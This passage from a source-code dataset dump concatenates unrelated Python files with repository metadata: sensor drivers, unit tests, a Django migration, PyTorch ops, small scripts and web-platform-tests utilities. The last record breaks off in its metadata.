/src/sensorrunner/devices/SPI/ADC/device.py
|
48e20b4d57883c0fadef06f30a025389e38cda66
|
[] |
no_license
|
JackBurdick/sensorrunner
|
90e05e35381363ad28301b0e28579372fd78c179
|
506772d2ec4887b3890e4555b66bf5548910d020
|
refs/heads/master
| 2023-07-02T18:26:21.418501 | 2021-02-22T02:27:04 | 2021-02-22T02:27:04 | 298,879,591 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,386 |
py
|
from sensorrunner.devices.sensor.SPI.ADC.light.pt19 import PT19
from gpiozero import MCP3008, Device
# from gpiozero.pins.mock import MockFactory
from gpiozero.pins.native import NativeFactory
Device.pin_factory = NativeFactory()
class MDC3800:
def __init__(
self,
name,
# devices
devices_dict,
):
# NOTE: accepting tuples currently because I'm not sure what the config
# will look like yet
# "fn": None --> resort to default fn
self.ALLOWED_DEVICES = {"pt19": {"device_class": PT19, "fn": None}}
# connected = (name, address, channel, device, fn)
if devices_dict is None:
raise ValueError("no devices specified in `device_dict`")
# TODO: assure pins are valid/acceptable
# light = MCP3008(channel=0, clock_pin=11, mosi_pin=10, miso_pin=9,
# select_pin=8)
# TODO: ensure channel 0-8
channel_to_device = {}
devices = {}
for name, dd in devices_dict.items():
devices[name] = {}
cur_dev_class = self.ALLOWED_DEVICES[dd["device_type"]]["device_class"]
if dd["channel"] not in channel_to_device:
channel_to_device[dd["channel"]] = MCP3008(
channel=dd["channel"],
clock_pin=11,
mosi_pin=10,
miso_pin=9,
select_pin=8,
)
cur_device = channel_to_device[dd["channel"]]
cur_device_obj = cur_dev_class(cur_device)
# TODO: this really isn't a device_type but a device_object - same
# in I2C
devices[name]["device_type"] = cur_device_obj
available_fns = [
f
for f in dir(cur_device)
if callable(getattr(cur_device, f)) and not f.startswith("_")
]
try:
dev_fn = dd["fn_name"]
except KeyError:
dev_fn = None
if dev_fn is not None:
if dev_fn not in available_fns:
raise ValueError(
f"specified fn ({dev_fn}) for {name} not available for {cur_device}.\n"
f"please select from {available_fns}"
)
fn_name = dev_fn
else:
fn_name = "return_value"
try:
devices[name]["fn"] = getattr(devices[name]["device_type"], fn_name)
except KeyError:
raise ValueError(
f"specified fn ({fn_name}) for {name} not available for {cur_device}.\n"
f"please select from {available_fns}"
)
self.devices = devices
def return_value(self, name, params):
if name is None:
return ValueError(
f"no name specified. please select from {self.devices.keys()}"
)
if not isinstance(name, str):
return ValueError(f"`name` is expected to be type {str}, not {type(name)}")
try:
dev_d = self.devices[name]
except KeyError:
raise ValueError(
f"{name} is not available. please select from {self.devices.keys()}"
)
if params:
value = dev_d["fn"](**params)
else:
# TODO: try
value = dev_d["fn"]()
return value
@staticmethod
def build_task_params(device_name, device_dict):
"""
dist0 = Entry(
"run_dist_0",
"tasks.iic.tasks.dist_select",
schedule=celery.schedules.schedule(run_every=2),
kwargs={},
app=celery_app.app,
)
# name=None, task=None, schedule=None, kwargs, app
{
"env_a": {
"channel": 2,
"address": 114,
"device_type": "si7021",
"params": {"run": {"unit": "f"}, "schedule": {"frequency": 1800.0}},
"fn_name": None,
},
"dist_a": {
"channel": 0,
"address": 112,
"device_type": "vl53l0x",
"params": {"run": {"unit": "in"}, "schedule": {"frequency": 1800.0}},
"fn_name": None,
},
}
"""
DEFAULT_FN_NAME = "return_value"
entry_specs = {}
for comp_name, comp_dict in device_dict.items():
dev_dict = comp_dict.copy()
entry_d = {}
fn_name = comp_dict["fn_name"]
if fn_name is None:
fn_name = DEFAULT_FN_NAME
entry_d["name"] = f"{device_name}_{comp_name}_{fn_name}"
# TODO: make more robust
entry_d["task"] = "sensorrunner.tasks.devices.MDC3800.tasks.MDC3800_run"
# maybe make schedule outside this?
entry_d["run_every"] = comp_dict["params"]["schedule"]["frequency"]
if not isinstance(dev_dict, dict):
raise ValueError(
f"run params ({dev_dict}) expected to be type {dict}, not {type(dev_dict)}"
)
# add component name
dev_dict["name"] = comp_name
entry_d["kwargs"] = {"dev_dict": dev_dict}
entry_specs[comp_name] = entry_d
return entry_specs
|
[
"[email protected]"
] | |
eb1babf920093b006230d7ec6c101e59b897093d
|
cf91f1a6354ba7a803af8382e0ef8bde6175845e
|
/tests/test_with.py
|
1fd2a1f616ddef483c4ca7b17a027e7e1cd824b0
|
[] |
permissive
|
mueslo/python-progressbar
|
a230dc1be0af48015215d10a6b21e1d15005ccb4
|
5621a26b51cddc3ce3f2b62a9e32a28eb60a2f84
|
refs/heads/master
| 2022-11-10T18:23:08.242413 | 2020-06-25T19:36:56 | 2020-06-25T19:36:56 | 275,635,088 | 0 | 0 |
BSD-3-Clause
| 2020-06-28T17:29:57 | 2020-06-28T17:29:56 | null |
UTF-8
|
Python
| false | false | 429 |
py
|
import progressbar
def test_with():
with progressbar.ProgressBar(max_value=10) as p:
for i in range(10):
p.update(i)
def test_with_stdout_redirection():
with progressbar.ProgressBar(max_value=10, redirect_stdout=True) as p:
for i in range(10):
p.update(i)
def test_with_extra_start():
with progressbar.ProgressBar(max_value=10) as p:
p.start()
p.start()
|
[
"[email protected]"
] | |
01fd76371431a37e8804b4f2de5e71eb488b3154
|
0e9f73d2ef1239b22e049ef6338362da7dbfb122
|
/source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0097_auto_20190514_2147.py
|
5d4d4dab7faf5ac58c7e11ed8ee2ae65fe9af49c
|
[] |
no_license
|
Andy-Mason/FatQuants
|
3c4bfafc29834af76b0be40e93b0e210e0ef5056
|
edd0e98f4599ef91adbdf4179164769ddd66c62a
|
refs/heads/master
| 2023-01-11T10:57:50.563742 | 2021-08-11T19:04:59 | 2021-08-11T19:04:59 | 73,127,295 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 745 |
py
|
# Generated by Django 2.1.7 on 2019-05-14 20:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ticker', '0096_auto_20190514_2147'),
]
operations = [
migrations.AddField(
model_name='ticker',
name='product_leverage',
field=models.FloatField(blank=True, db_column='product_leverage', null=True, verbose_name='Product Leverage'),
),
migrations.AddField(
model_name='ticker',
name='unit_type',
field=models.CharField(blank=True, choices=[('Acc', 'Accumulation'), ('Inc', 'Income')], db_column='unit_type', default='', max_length=3, verbose_name='Unit Type'),
),
]
|
[
"[email protected]"
] | |
385053382cb462ca295e3ea3ca1df86b6ad1b044
|
99b2aff89dcec2f43cee32a6bdd4c0c43d6c51fa
|
/tests/contract_tests/growl_tdg_garden/test_growl_tdg_garden_pick_intial_id.py
|
1782590265f597e5d879efb03aac96504f4f4d5d
|
[
"MIT"
] |
permissive
|
baking-bad/pytezos
|
c4248bde49a5b05521b8cc51eeca588b1a721660
|
19747e3acec2141f06e812025673f497fc07e2d4
|
refs/heads/master
| 2023-07-06T21:57:09.572985 | 2023-07-05T11:45:27 | 2023-07-05T11:45:27 | 169,243,460 | 115 | 43 |
MIT
| 2023-07-04T16:28:09 | 2019-02-05T13:12:50 |
Python
|
UTF-8
|
Python
| false | false | 1,885 |
py
|
import json
from os.path import dirname
from os.path import join
from unittest import TestCase
from pytezos.michelson.forge import forge_micheline
from pytezos.michelson.forge import unforge_micheline
from pytezos.michelson.program import MichelsonProgram
folder = 'typed_minter'
entrypoint = 'mint_TYPED'
class MainnetOperationTestCaseGROWL_TDG_GARDEN(TestCase):
@classmethod
def setUpClass(cls):
with open(join(dirname(__file__), f'', '__script__.json')) as f:
script = json.loads(f.read())
cls.program = MichelsonProgram.match(script['code'])
with open(join(dirname(__file__), f'', f'pick_intial_id.json')) as f:
operation = json.loads(f.read())
cls.entrypoint = f'pick_intial_id'
cls.operation = operation
# cls.maxDiff = None
def test_parameters_growl_tdg_garden(self):
original_params = self.program.parameter.from_parameters(self.operation['parameters'])
py_obj = original_params.to_python_object()
# pprint(py_obj)
readable_params = self.program.parameter.from_parameters(original_params.to_parameters(mode='readable'))
self.assertEqual(py_obj, readable_params.to_python_object())
self.program.parameter.from_python_object(py_obj)
def test_lazy_storage_growl_tdg_garden(self):
storage = self.program.storage.from_micheline_value(self.operation['storage'])
lazy_storage_diff = self.operation['lazy_storage_diff']
extended_storage = storage.merge_lazy_diff(lazy_storage_diff)
py_obj = extended_storage.to_python_object(try_unpack=True, lazy_diff=True)
# pprint(py_obj)
def test_parameters_forging(self):
expected = self.operation['parameters'].get('value', {'prim': 'Unit'})
actual = unforge_micheline(forge_micheline(expected))
self.assertEqual(expected, actual)
|
[
"[email protected]"
] | |
bfdfc1a62852507f68a014cbcc9ad012b1f7e16e
|
9139bd5dad2c66f070d1eb01958a11a2af1c9835
|
/game-again.py
|
224f4ce078f24c31bd6fed0be854de5fba7b5cf7
|
[] |
no_license
|
anmolrajaroraa/python-reg-oct
|
7223487b864d969e89f9daae2a77522405977f27
|
acb62ad7c8acb78f348bdc47e5ed6230808d967c
|
refs/heads/master
| 2020-08-04T09:10:25.152732 | 2019-11-08T08:57:28 | 2019-11-08T08:57:28 | 212,085,152 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 292 |
py
|
import pygame
pygame.init()
HEIGHT = 500
WIDTH = 1000
# red green blue (0-255)
BLACK = 0,0,0
WHITE = 255,255,255
RED = 255,0,0
RANDOM_COLOR = 100,150,200
gameboard = pygame.display.set_mode((WIDTH,HEIGHT))
while True:
print("!")
gameboard.fill( BLACK )
pygame.display.update( )
|
[
"[email protected]"
] | |
20ede17c952b40d8bfe9406df93dd193f5dceb68
|
b4ddc954a7dc0d24352de64a567c10c9e7231eee
|
/LeetCode/Pascal_Triangle.py
|
19ffa5bc0886c62656dc9045ad7221ae44c9f5e0
|
[] |
no_license
|
sharadbhat/Competitive-Coding
|
4d80c99093bf05a2213799c95467309cf3e40d07
|
79eec04cc6b1ac69295530bda1575ecb613a769e
|
refs/heads/master
| 2023-07-05T02:25:33.397140 | 2023-06-27T05:38:12 | 2023-06-27T05:38:12 | 78,031,600 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 490 |
py
|
# LeetCode
# https://leetcode.com/problems/pascals-triangle/description/
class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
if numRows == 0:
return []
l = [[1]]
for i in range(1, numRows):
k = [1]
for j in range(1, i):
k.append(l[i - 1][j - 1] + l[i - 1][j])
k.append(1)
l.append(k)
return l
|
[
"[email protected]"
] | |
ba79f0a7a16eee2f5d086bd7d5e06adec8636825
|
f10d45aecbfccb3f469ab0c4ae55fc0f256c9004
|
/Functions/chr_ord.py
|
80c8745e0e21329911e636eedb326846d34957cc
|
[] |
no_license
|
Do-code-ing/Python_Built-ins
|
c34c1cea19a2cef80ab3a16d050e8825af0feb59
|
03b2f277acde4fce00bb521e3a0b8c0469b39879
|
refs/heads/master
| 2023-07-29T15:30:00.693005 | 2021-09-04T18:48:18 | 2021-09-04T18:48:18 | 354,467,767 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
# chr(i) : character(int)
# ์ ๋์ฝ๋ ํฌ์ธํธ ์ ์ ๊ฐ์ ์
๋ ฅํ๋ฉด ํด๋น ์ ์ ๊ฐ์ ์ ๋์ฝ๋ ๋ฌธ์์ด์ ๋ฐํํ๋ค.
# i ๊ฐ 0 ~ 1,114,111(16์ง์๋ก 0x10FFFF)๋ฅผ ๋ฒ์ด๋๋ฉด 'ValueError'๊ฐ ๋ฐ์ํ๋ค.
# ์ ์๋ฅผ ๋ฌธ์๋ก
print(chr(8364))
# 'โฌ'
# ord(c) : ordinary character(character)
# ์ ๋์ฝ๋ ๋ฌธ์์ด์ด ์ฃผ์ด์ง๋ฉด ํด๋น ๋ฌธ์์ ์ ๋์ฝ๋ ์ฝ๋ ํฌ์ธํธ ์ ์ ๊ฐ์ ๋ฐํํ๋ค.
# chr() ์ ๋ฐ๋๋ก ์๋ํ๋ค.
# ๋ฌธ์๋ฅผ ์ ์๋ก
print(ord("โฌ"))
# 8364
|
[
"[email protected]"
] | |
ea0d2d7415c8d98590a6caf8cc4bb1aa659fd24e
|
1457bf059b94e04d4d512012b28a924167c68938
|
/NetworkBehaviour/Basics/Normalization_Sparse.py
|
164188463a9a59cb81bc31b3411633742dab0ba2
|
[] |
no_license
|
YaminaDJOUDI/PymoNNto
|
e063c81547d41a9841ff8f8071c4d6347ce792da
|
807aa7e0ba38cb29ad7839b39f29752da00eee78
|
refs/heads/master
| 2023-07-08T03:06:41.722292 | 2021-08-04T11:30:52 | 2021-08-04T11:30:52 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 850 |
py
|
import numpy as np
scipy.sparse
def normalize_synapse_attr_sparse(src_attr, target_attr, target_value, neurons, synapse_type):
neurons.temp_weight_sum = neurons.get_neuron_vec()
for s in neurons.afferent_synapses[synapse_type]:
if 'sparse' in s.tags:
s.dst.temp_weight_sum += np.array(getattr(s, src_attr).sum(1)).flatten()
else:
s.dst.temp_weight_sum += np.sum(getattr(s, src_attr), axis=1)
neurons.temp_weight_sum /= target_value
for s in neurons.afferent_synapses[synapse_type]:
if 'sparse' in s.tags:
W = getattr(s, target_attr)
W.data /= np.array(neurons.temp_weight_sum[W.indices]).reshape(W.data.shape)
else:
setattr(s, target_attr, getattr(s, target_attr) / (s.dst.temp_weight_sum[:, None]+(s.dst.temp_weight_sum[:, None]==0)))
|
[
"[email protected]"
] | |
e0af98a161bb2fe76f40a9dab414307691aed916
|
cdecfcc56973ae143f04a9e92225c5fc90a052ab
|
/tracing/tracing/value/diagnostics/reserved_infos.py
|
13aedf28520e992994fa0efa641eba6d7f919036
|
[
"BSD-3-Clause"
] |
permissive
|
eugenesavenko/catapult
|
8e43adab9a4650da4e8e1860f3b9b49936955aae
|
f2ad70de40a8f739438d89b0c8d5ed6509b3cbe6
|
refs/heads/master
| 2021-05-05T17:31:51.483972 | 2017-09-13T15:10:56 | 2017-09-13T15:10:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,662 |
py
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class _Info(object):
def __init__(self, name, _type=None, entry_type=None):
self._name = name
self._type = _type
if entry_type is not None and self._type != 'GenericSet':
raise ValueError(
'entry_type should only be specified if _type is GenericSet')
self._entry_type = entry_type
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def entry_type(self):
return self._entry_type
ANGLE_REVISIONS = _Info('angleRevisions', 'GenericSet', str)
ARCHITECTURES = _Info('architectures', 'GenericSet', str)
BENCHMARKS = _Info('benchmarks', 'GenericSet', str)
BENCHMARK_START = _Info('benchmarkStart', 'DateRange')
BOTS = _Info('bots', 'GenericSet', str)
BUG_COMPONENTS = _Info('bugComponents', 'GenericSet', str)
BUILDS = _Info('builds', 'GenericSet', int)
CATAPULT_REVISIONS = _Info('catapultRevisions', 'GenericSet', str)
CHROMIUM_COMMIT_POSITIONS = _Info('chromiumCommitPositions', 'GenericSet', int)
CHROMIUM_REVISIONS = _Info('chromiumRevisions', 'GenericSet', str)
GPUS = _Info('gpus', 'GenericSet', str)
GROUPING_PATH = _Info('groupingPath')
LABELS = _Info('labels', 'GenericSet', str)
LOG_URLS = _Info('logUrls', 'GenericSet', str)
MASTERS = _Info('masters', 'GenericSet', str)
MEMORY_AMOUNTS = _Info('memoryAmounts', 'GenericSet', int)
MERGED_FROM = _Info('mergedFrom', 'RelatedHistogramMap')
MERGED_TO = _Info('mergedTo', 'RelatedHistogramMap')
OS_NAMES = _Info('osNames', 'GenericSet', str)
OS_VERSIONS = _Info('osVersions', 'GenericSet', str)
OWNERS = _Info('owners', 'GenericSet', str)
PRODUCT_VERSIONS = _Info('productVersions', 'GenericSet', str)
RELATED_NAMES = _Info('relatedNames', 'GenericSet', str)
SKIA_REVISIONS = _Info('skiaRevisions', 'GenericSet', str)
STORIES = _Info('stories', 'GenericSet', str)
STORYSET_REPEATS = _Info('storysetRepeats', 'GenericSet', int)
STORY_TAGS = _Info('storyTags', 'GenericSet', str)
TAG_MAP = _Info('tagmap', 'TagMap')
TRACE_START = _Info('traceStart', 'DateRange')
TRACE_URLS = _Info('traceUrls', 'GenericSet', str)
V8_COMMIT_POSITIONS = _Info('v8CommitPositions', 'DateRange')
V8_REVISIONS = _Info('v8Revisions', 'GenericSet', str)
WEBRTC_REVISIONS = _Info('webrtcRevisions', 'GenericSet', str)
def GetTypeForName(name):
for info in globals().itervalues():
if isinstance(info, _Info) and info.name == name:
return info.type
def AllInfos():
for info in globals().itervalues():
if isinstance(info, _Info):
yield info
|
[
"[email protected]"
] | |
286e5a84629ddfa8a87808ef1f9d99445655a7e5
|
7e79ca343d8d3246fc783161673550f6e4ae8896
|
/tests/test_search.py
|
73b1bddf6e9c87215ffb0554d6c68407a13132a2
|
[
"MIT"
] |
permissive
|
interrogator/buzz
|
5ba0907115aa29efc24f016d1345a0371b91350a
|
7627b8ce4a286f65388f0825487441df00055b39
|
refs/heads/master
| 2023-04-02T03:18:01.691139 | 2020-11-19T12:00:21 | 2020-11-19T12:00:21 | 163,623,092 | 42 | 2 |
MIT
| 2023-03-25T00:51:45 | 2018-12-30T22:55:18 |
Python
|
UTF-8
|
Python
| false | false | 2,544 |
py
|
import unittest
from buzz.corpus import Corpus
class TestSearch(unittest.TestCase):
@classmethod
def setUpClass(cls):
""" get_some_resource() is slow, to avoid calling it for each test use setUpClass()
and store the result as class variable
"""
super().setUpClass()
cls.parsed = Corpus("tests/testing-parsed")
cls.loaded = cls.parsed.load()
def test_non_loaded(self):
# todo: find out why .equals isn't the same.
res = self.parsed.depgrep("w/book/ = x/NOUN/")
lres = self.loaded.depgrep("w/book/ = x/NOUN/")
self.assertEqual(len(res), 3)
self.assertTrue(list(res._n) == list(lres._n))
res = self.parsed.depgrep("l/book/")
lres = self.loaded.depgrep("l/book/")
self.assertEqual(len(res), 6)
self.assertTrue(list(res.index) == list(lres.index))
self.assertTrue(list(res._n) == list(lres._n))
def test_bigrams(self):
j = self.loaded.just.words("(?i)jungle")
self.assertEqual(len(j), 6)
big = self.loaded.bigrams.depgrep("l/jungle/", from_reference=True).table(
show=["x"]
)
self.assertTrue("punct" in big.columns)
self.assertEqual(big.shape[1], 5)
no_punct = self.loaded.skip.wordclass.PUNCT
big = no_punct.bigrams.lemma("jungle", from_reference=False).table(show=["x"])
self.assertFalse("punct" in big.columns)
self.assertEqual(big.shape[1], 3)
def test_depgrep(self):
res = self.loaded.depgrep("L/book/")
self.assertEqual(len(res), 3)
res = self.loaded.depgrep('x/^NOUN/ -> l"the"', case_sensitive=False)
sup = self.loaded.depgrep('p/^N/ -> l"the"', case_sensitive=False)
# sup is a superset of res
self.assertTrue(all(i in sup.index for i in res.index))
self.assertEqual(len(sup), 28)
self.assertEqual(len(res), 24)
self.assertTrue((res.x == "NOUN").all())
# let us check this manually
# get all rows whose lemma is 'the'
the = self.loaded[self.loaded["l"] == "the"]
count = 0
# iterate over rows, get governor of the, lookup this row.
# if row is a noun, check that its index is in our results
for (f, s, _), series in the.T.items():
gov = series["g"]
gov = self.loaded.loc[f, s, gov]
if gov.x == "NOUN":
self.assertTrue(gov.name in res.index)
count += 1
self.assertEqual(count, len(res))
|
[
"[email protected]"
] | |
de198265ca023fde36b1896bd7f7a3c4b83a552d
|
d94b6845aeeb412aac6850b70e22628bc84d1d6d
|
/bigg/bigg/torch_ops/tensor_ops.py
|
9f544ab7efd4d3e2c752d63f5d72056f16c23cef
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
ishine/google-research
|
541aea114a68ced68736340e037fc0f8257d1ea2
|
c1ae273841592fce4c993bf35cdd0a6424e73da4
|
refs/heads/master
| 2023-06-08T23:02:25.502203 | 2023-05-31T01:00:56 | 2023-05-31T01:06:45 | 242,478,569 | 0 | 0 |
Apache-2.0
| 2020-06-23T01:55:11 | 2020-02-23T07:59:42 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 3,956 |
py
|
# coding=utf-8
# Copyright 2023 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: skip-file
import torch
from torch.nn import Module
from torch.nn.parameter import Parameter
from torch.autograd import Function
import numpy as np
from bigg.common.consts import t_float
class MultiIndexSelectFunc(Function):
@staticmethod
def forward(ctx, idx_froms, idx_tos, *mats):
assert len(idx_tos) == len(idx_froms) == len(mats)
cols = mats[0].shape[1]
assert all([len(x.shape) == 2 for x in mats])
assert all([x.shape[1] == cols for x in mats])
num_rows = sum([len(x) for x in idx_tos])
out = mats[0].new(num_rows, cols)
for i, mat in enumerate(mats):
x_from = idx_froms[i]
x_to = idx_tos[i]
if x_from is None:
out[x_to] = mat.detach()
else:
assert len(x_from) == len(x_to)
out[x_to] = mat[x_from].detach()
ctx.idx_froms = idx_froms
ctx.idx_tos = idx_tos
ctx.shapes = [x.shape for x in mats]
return out
@staticmethod
def backward(ctx, grad_output):
idx_froms, idx_tos = ctx.idx_froms, ctx.idx_tos
list_grad_mats = [None, None]
for i in range(len(idx_froms)):
x_from = idx_froms[i]
x_to = idx_tos[i]
if x_from is None:
grad_mat = grad_output[x_to].detach()
else:
grad_mat = grad_output.new(ctx.shapes[i]).zero_()
grad_mat[x_from] = grad_output[x_to].detach()
list_grad_mats.append(grad_mat)
return tuple(list_grad_mats)
class MultiIndexSelect(Module):
def forward(self, idx_froms, idx_tos, *mats):
return MultiIndexSelectFunc.apply(idx_froms, idx_tos, *mats)
multi_index_select = MultiIndexSelect()
def test_multi_select():
a = Parameter(torch.randn(4, 2))
b = Parameter(torch.randn(3, 2))
d = Parameter(torch.randn(5, 2))
idx_froms = [[0, 1], [1, 2], [3, 4]]
idx_tos = [[4, 5], [0, 1], [2, 3]]
c = multi_index_select(idx_froms, idx_tos, a, b, d)
print('===a===')
print(a)
print('===b===')
print(b)
print('===d===')
print(d)
print('===c===')
print(c)
t = torch.sum(c)
t.backward()
print(a.grad)
print(b.grad)
print(d.grad)
class PosEncoding(Module):
def __init__(self, dim, device, base=10000, bias=0):
super(PosEncoding, self).__init__()
p = []
sft = []
for i in range(dim):
b = (i - i % 2) / dim
p.append(base ** -b)
if i % 2:
sft.append(np.pi / 2.0 + bias)
else:
sft.append(bias)
self.device = device
self.sft = torch.tensor(sft, dtype=t_float).view(1, -1).to(device)
self.base = torch.tensor(p, dtype=t_float).view(1, -1).to(device)
def forward(self, pos):
with torch.no_grad():
if isinstance(pos, list):
pos = torch.tensor(pos, dtype=t_float).to(self.device)
pos = pos.view(-1, 1)
x = pos / self.base + self.sft
return torch.sin(x)
if __name__ == '__main__':
# test_multi_select()
pos_enc = PosEncoding(128, 'cpu')
print(pos_enc([1, 2, 3]))
|
[
"[email protected]"
] | |
b7b026f7642d82363d9802fe0d817ba66118aad4
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/ec_11022-1357/sdB_EC_11022-1357_lc.py
|
350257c414f2078d50e83da141fccc17f22aa32c
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 351 |
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[166.190667,-14.236356], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_EC_11022-1357 /sdB_EC_11022-1357_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
0bd82e74ba3c6621cb7fa14b9f43311bc864df59
|
3a28b1a12d0710c06f6360381ad8be6cf3707907
|
/modular_model/triHPC/triHPCThermo/HPCAllTrays23CstmVapN2.py
|
b31256787ee26b7321199ab3098b7e3d1d66394a
|
[] |
no_license
|
WheatZhang/DynamicModelling
|
6ce1d71d3b55176fd4d77a6aedbaf87e25ce4d02
|
ea099245135fe73e8c9590502b9c8b87768cb165
|
refs/heads/master
| 2020-06-15T14:12:50.373047 | 2019-07-05T01:37:06 | 2019-07-05T01:37:06 | 195,319,788 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 307 |
py
|
def VapN2(P,T,x_N2):
x = (P-5.50184878e+02)/3.71707400e-01
y = (T--1.77763832e+02)/1.81029000e-02
z = (x_N2-9.82420040e-01)/2.44481265e-03
output = \
1*-8.60567815e-01+\
z*1.86073097e+00+\
y*8.60696199e-01+\
x*-4.21414345e-01
y_N2 = output*1.31412243e-03+9.90969573e-01
return y_N2
|
[
"[email protected]"
] | |
7a09c2d76104f8dd348cfb5c054d8ed6d565d3e1
|
b212ec9d705fb77cac102dceb12eb668099fd1ae
|
/oop/exams/december_2020/tests/project/spaceship/spaceship.py
|
0defe638ec725097b266e2afa6f7fdba3fb197b5
|
[] |
no_license
|
xpucko/Software-University-SoftUni
|
20ef91a0be91a8a09a56d9fdc15888f91409de2f
|
a1fc1781424f025954948299be7f75d317e32dc1
|
refs/heads/master
| 2023-02-04T11:58:33.068431 | 2020-12-24T00:39:11 | 2020-12-24T00:39:11 | 280,227,310 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,052 |
py
|
class Spaceship:
SPACESHIP_FULL = "Spaceship is full"
ASTRONAUT_EXISTS = "Astronaut {} Exists"
ASTRONAUT_NOT_FOUND = "Astronaut Not Found"
ASTRONAUT_ADD = "Added astronaut {}"
ASTRONAUT_REMOVED = "Removed {}"
ZERO_CAPACITY = 0
def __init__(self, name: str, capacity: int):
self.name = name
self.capacity = capacity
self.astronauts = []
def add(self, astronaut_name: str) -> str:
if len(self.astronauts) == self.capacity:
raise ValueError(self.SPACESHIP_FULL)
if astronaut_name in self.astronauts:
raise ValueError(self.ASTRONAUT_EXISTS.format(astronaut_name))
self.astronauts.append(astronaut_name)
return self.ASTRONAUT_ADD.format(astronaut_name)
def remove(self, astronaut_name: str) -> str:
if astronaut_name not in self.astronauts:
raise ValueError(self.ASTRONAUT_NOT_FOUND.format(astronaut_name))
self.astronauts.remove(astronaut_name)
return self.ASTRONAUT_REMOVED.format(astronaut_name)
|
[
"[email protected]"
] | |
a67b3be8bf770a11a0515a42fe9e37b479324764
|
297497957c531d81ba286bc91253fbbb78b4d8be
|
/testing/web-platform/tests/tools/manifest/utils.py
|
5cd53c22e7745bd3656dadd6940aa4d5f33f4f19
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
marco-c/gecko-dev-comments-removed
|
7a9dd34045b07e6b22f0c636c0a836b9e639f9d3
|
61942784fb157763e65608e5a29b3729b0aa66fa
|
refs/heads/master
| 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 |
NOASSERTION
| 2019-09-29T01:27:49 | 2019-09-27T10:44:24 |
C++
|
UTF-8
|
Python
| false | false | 2,232 |
py
|
import os
import subprocess
import sys
from typing import Any, Callable, Generic, Optional, Text, TypeVar
T = TypeVar("T")
def rel_path_to_url(rel_path: Text, url_base: Text = "/") -> Text:
assert not os.path.isabs(rel_path), rel_path
if url_base[0] != "/":
url_base = "/" + url_base
if url_base[-1] != "/":
url_base += "/"
return url_base + rel_path.replace(os.sep, "/")
def from_os_path(path: Text) -> Text:
assert os.path.sep == "/" or sys.platform == "win32"
if "/" == os.path.sep:
rv = path
else:
rv = path.replace(os.path.sep, "/")
if "\\" in rv:
raise ValueError("path contains \\ when separator is %s" % os.path.sep)
return rv
def to_os_path(path: Text) -> Text:
assert os.path.sep == "/" or sys.platform == "win32"
if "\\" in path:
raise ValueError("normalised path contains \\")
if "/" == os.path.sep:
return path
return path.replace("/", os.path.sep)
def git(path: Text) -> Optional[Callable[..., Text]]:
def gitfunc(cmd: Text, *args: Text) -> Text:
full_cmd = ["git", cmd] + list(args)
try:
return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
except Exception as e:
if sys.platform == "win32" and isinstance(e, WindowsError):
full_cmd[0] = "git.bat"
return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
else:
raise
try:
gitfunc("rev-parse", "--show-toplevel")
except (subprocess.CalledProcessError, OSError):
return None
else:
return gitfunc
class cached_property(Generic[T]):
def __init__(self, func: Callable[[Any], T]) -> None:
self.func = func
self.__doc__ = getattr(func, "__doc__")
self.name = func.__name__
def __get__(self, obj: Any, cls: Optional[type] = None) -> T:
if obj is None:
return self
assert self.name not in obj.__dict__
rv = obj.__dict__[self.name] = self.func(obj)
obj.__dict__.setdefault("__cached_properties__", set()).add(self.name)
return rv
|
[
"[email protected]"
] | |
c10025495e49e178e839ee495b8d2b7559ca3fc4
|
6b16458a0c80613a66c251511462e7a7d440970e
|
/packages/pyright-internal/src/tests/samples/variadicTypeVar5.py
|
8089b00a89ef9b4f7adfc12be8efb3939e34e3d4
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
ikamensh/pyright
|
3bbbb2cf1a1bdbbecb89ef389036756f47ef7114
|
5ea620ad2008de57dcac720a84674bdb712bffc4
|
refs/heads/main
